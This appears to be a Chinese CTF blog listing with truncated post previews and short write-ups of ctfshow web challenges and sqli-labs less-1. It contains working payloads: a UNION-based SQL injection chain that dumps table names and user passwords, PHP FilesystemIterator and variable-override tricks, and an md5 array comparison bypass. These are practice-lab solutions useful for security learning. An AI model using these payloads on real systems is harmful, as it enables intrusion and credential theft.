MISCvimjail1这道题一连接就是插入模式，想办法退出插入模式. 1234567#entry.sh#!/usr/bin/env shchmod -r /flag.txtvim -R -M -Z -u /home/user/vim...

MISCPAPAPAPA下载下来附件是一张全白的图片，通过修改jpg的宽高获得flag 从FF到01中间，修改成FF C0 00 11 08 02 00 02 10 03 01 31 00 02 31 01 03 31 01 右边就...

WEBCivilization1234567891011121314<?phprequire("./flag.php");if(isset($_GET['source'])){ ...

web126与web125差不多 12get: a=1+fl0g=flag_give_mepost: CTF_SHOW=&CTF[SHOW.COM=&fun=parse_str($a[1]) web127绕过方式和we...

web110
考察FilesystemIterator。getcwd()函数 获取当前工作目录 返回当前工作目录。
payload:
1
?v1=FilesystemIterator&v2=getcwd

缺陷是如果flag的文件不在第一位的话，就不能得到这个文件名。

1
2
3
4
foreach($_GET as $key => $value){
if($key==='error'){
die("what are you doing?!");
}

这一段说get传的值不能等于error。
1
2
3
4
foreach($_POST as $key => $value){
if($value==='flag'){
die("what are you doing?!");
}

这一段说POST传的值不能等于flag。
1
2
3
if(!($_POST['flag']==$flag)){
die($error);
}

这一段说POST传的值不等于flag的话输出变量error。
payload:
1
2
GET:?a=flag
POST:error=a

Welcome to Hexo! This is your very first post. Check documentation for more info. If you get any problems when using ...

less-1
看报错可知，这是闭合单引号。
1
2
3
4
?id=1'order by 3 -- - #确定那个字段有回显
?id=-1'union select 1,2,group_concat(table_name) from information_schema.tables where table_schema='security' -- - #查询表名
?id=-1'union select 1,2,group_concat(column_name) from information_schema.columns where table_schema='security' and table_name='users' -- - #查询列名
?id=-1'union select 1,2,group_concat(username,'~',password) from users -- - #查询当前数据库user表里面的username和password。

web101 12当新建ReflectionClass类并传入PHP代码时，会返回代码的运行结果，可以通过echo显示即使传入了空的括号，代码依旧可以运行，且error_reporting(0)的存在阻止了报错 v1必须是数字，v2可...

web97
要求POST传参，a不能等于b，但是a和b的md5值要相同，但是md5这个函数呢有个漏洞，传入的参数为数组的时候会发生错误，并返回NULL。
1
a[]=123&b[]=1234